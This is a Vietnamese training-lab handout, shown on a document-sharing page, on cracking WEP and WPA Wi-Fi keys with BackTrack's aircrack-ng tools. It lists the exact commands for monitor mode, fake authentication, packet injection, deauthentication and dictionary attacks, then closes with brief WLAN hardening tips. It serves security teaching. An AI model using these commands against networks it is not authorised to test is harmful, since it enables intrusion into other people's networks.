Tải bản đầy đủ (.pdf) (11 trang)
  1. Trang chủ
    2. >>
  2. Công Nghệ Thông Tin
    3. >>
  3. Quản trị Web

Tài liệu Tấn công mạng Wireless LAN sử dụng bảo mật dạng WEP docx

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.13 MB, 11 trang )

Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 1
LAB TẤN CÔNG VÀ PHÒNG THỦ WIRELESS LAN
Access Point
Wireless Client
Wireless Client
Router ADSL
Hacker

Hình 1.1
Tấn công mạng Wireless LAN sử dụng bảo mật dạng WEP
Chuẩn bị:
Các máy kết nối với nhau theo mô hình
Một máy có Wireless Card hỗ trợ Hack Wep (Bài Lab này chúng tôi sử dụng máy có
wireless Card với chip Atheros)
Công cụ Hack: sử dụng Back|Track 4 Final
Các bước thực hiện:
 Bước 1: Cấu hình máy tính boot từ CD, DVD và chọn Boot từ CD, DVD

Hình 1.2
 Bước 2: Sử dụng giao diện đồ họa trong Back Track
Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 2
Từ dấu nhắc gõ lệnh startx

Hình 1.3
 Bước 3: Chuyển card mạng sang chế độ monitor
Mở Terminal (tương tự như DOS trong Windows) và gõ lệnh iwconfig

Hình 1.4
Chuyển sang chế độ là monitor: gõ lệnh airmon-ng start wlan0 (wlan0 là tên card


mạng, có thể card mạng tên khác như ath0)
Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 3

Hình 1.5
 Bước 4: Tìm kiếm các Access Point (AP) phát sóng xung quanh
Gõ lệnh airodump-ng wlan0

Hình 1.6
 Bước 5: Chọn AP cần tấn công
Mở terminal thứ 2 và gõ lệnh: airodump-ng –c 6 –w wep wlan0
Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 4

Hình 1.7
 Bước 6: Hacker giả MAC Address (Wireless Client) chứng thực với AP
Mở terminal thứ 3 và gõ lệnh: Aireplay-ng -1 20 –a 00:1B:11:58:7B:A9 –h
11:12:13:14:15:16 wlan0

Hình 1.8
 Bước 7: Gửi gói tin lên mạng để làm tăng traffic nhằm mục đích thu thp gói tin nhanh
hơn để giải mã tìm KEY
Mở terminal thứ 4 và gõ lệnh: Aireplay-ng -3 –b 00:1B:11:58:7B:A9 –h
11:12:13:14:15:16 wlan0
Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 5

Hình 1.9
 Bước 8: Xem traffic đã thu thp được bao nhiêu (nếu WEP 64bit có thể thu thp
khoảng 10000  40000, còn nếu WEP 128bit thì thu thp lên đến khoảng 110000 để

giải mã) chúng ta trở lại màn hình ở Bước 4 và 5 để xem ở cột Data

Hình 1.10
 Bước 9: Tìm KEY
Mở terminal thứ 5 và gõ lệnh: Aircrack-ng web-01.cap
Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 6

Hình 1.11

Hình 1.12
Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 7
Tấn công mạng Wireless LAN sử dụng bảo mật dạng WAP

Các bước thực hiện:
 Bước 1: Cấu hình máy tính boot từ CD, DVD và chọn Boot từ CD, DVD
Xem hình 1.2
 Bước 2: Sử dụng giao diện đồ họa trong Back Track
Từ dấu nhắc gõ lệnh startx
Xem hình 1.3
 Bước 3: Chuyển card mạng sang chế độ monitor
Mở Terminal (tương tự như DOS trong Windows) và gõ lệnh iwconfig wlan0 (wlan0 là
tên card mạng, có thể card mạng tên khác như ath0)
Xem hình 1.4

Chuyển sang chế độ là monitor: gõ lệnh airmon-ng start wlan0
Xem hình 1.5

 Bước 4: Tìm kiếm các Access Point (AP) phát sóng xung quanh

Gõ lệnh airodump-ng wlan0

Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 8
Hình 1.13
 Bước 5: Chọn AP cần tấn công
Mở terminal thứ 2 và gõ lệnh: airodump-ng –c 6 –w wpa wlan0

Hình 1.14

Hình 1.15
Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 9
 Bước 6: Thiết lp 4 bước bắt tay với AP cần tấn công
Gõ lệnh: aireplay-ng -0 1 –b 00:1B:11:58:7B:A9 –c 00:1A:73:D9:9A:46 wlan0

Hình 1.16
 Bước 7: Trở về bước 5 xem đã bắt tay được với AP chưa?

Hình 1.17
 Bước 8: Tiến hành dò tìm KEY từ bộ từ điển (Dictionary) để bruteforce. Bạn có thể
dùng công cụ (PWDMAKER) tạo ra bộ từ điển hay bạn tạo một file và add vài Key để
test (ví dụ bộ từ điển của bạn là pass.txt)
Gõ lệnh: aircrack-ng –w pass.txt wpa-01.cap
Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 10

Hình 1.18

Hình 1.19


LINK DANH SÁCH CARD WIRELESS HỖ TRỢ HACK WIRELESS THAM KHẢO

Tấn Công Và Bảo Mt Mạng Wireless LAN ispace.edu.vn
DangNS iSPACE Lecturer – Network Security Group Trang 11
BO MT WLAN
Một hệ thống mạng không bao giờ là an toàn tuyệt đối bởi vì nhiều yếu tố khác nhau tác
động đến hệ thống mạng. Sau đây là một số biện pháp mà tôi đưa ra để các bạn có thể
bảo vệ cho hệ thống mạng WLAN của bạn được an toàn hơn.
1. Bảo mt WLAN bằng IP Address: chúng ta có thể không cho AP cấp địa chỉ IP động
(Disable DHCP) cho các Wireless Client hay dùng kỹ thut phân chia mạng con
(Supnetting) để cấp số lượng địa chỉ IP phù hợp với số lượng Wireless Client đang
hoạt động trong hệ thống mạng.
2. Ẩn SSID (Disable SSID Broadcast)
3. Lọc MAC Address: sử dụng tính năng lọc MAC Address của AP để cấm hay cho
phép một số Wireless Client gia nhp vào hệ thống mạng.
4. Sử dụng WPA với KEY phức tạp (bao gồm chữ hoa, chữ thường, số và ký tự đặc
biệt) và cố độ dài khoảng 10 ký tự trở lên.
5. Cao cấp hơn là bạn có thể sử dụng chứng thực bằng RADIUS. Nhưng chứng thực
bằng RADIUS thì đòi hỏi bạn cần phải có kiến thức chuyên sâu về quản trị mạng.


THE END

Tài liệu liên quan

Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Tải bản đầy đủ ngay
×